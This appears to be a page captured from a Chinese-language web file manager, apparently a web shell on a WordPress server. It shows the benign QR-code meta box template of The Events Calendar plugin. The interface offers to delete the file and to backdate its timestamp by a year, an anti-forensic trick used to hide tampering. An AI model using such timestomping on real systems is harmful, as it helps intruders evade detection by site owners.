文件操作 - qr-code-metabox.php
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/the-events-calendar/src/admin-views/qr-code-metabox.php
编辑文件内容
<?php /** * QR Code Meta Box Template * * @since 6.12.0 * * @var string $url The URL of the QR code. * @var string $label The label of the QR code. */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } ?> <p> <a type="button" class="button thickbox js-tec-qr-code-metabox" href="<?php echo esc_url( $url ); ?>" title="<?php esc_attr_e( 'QR Code', 'the-events-calendar' ); ?>"><?php echo esc_html( $label ); ?></a> </p>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件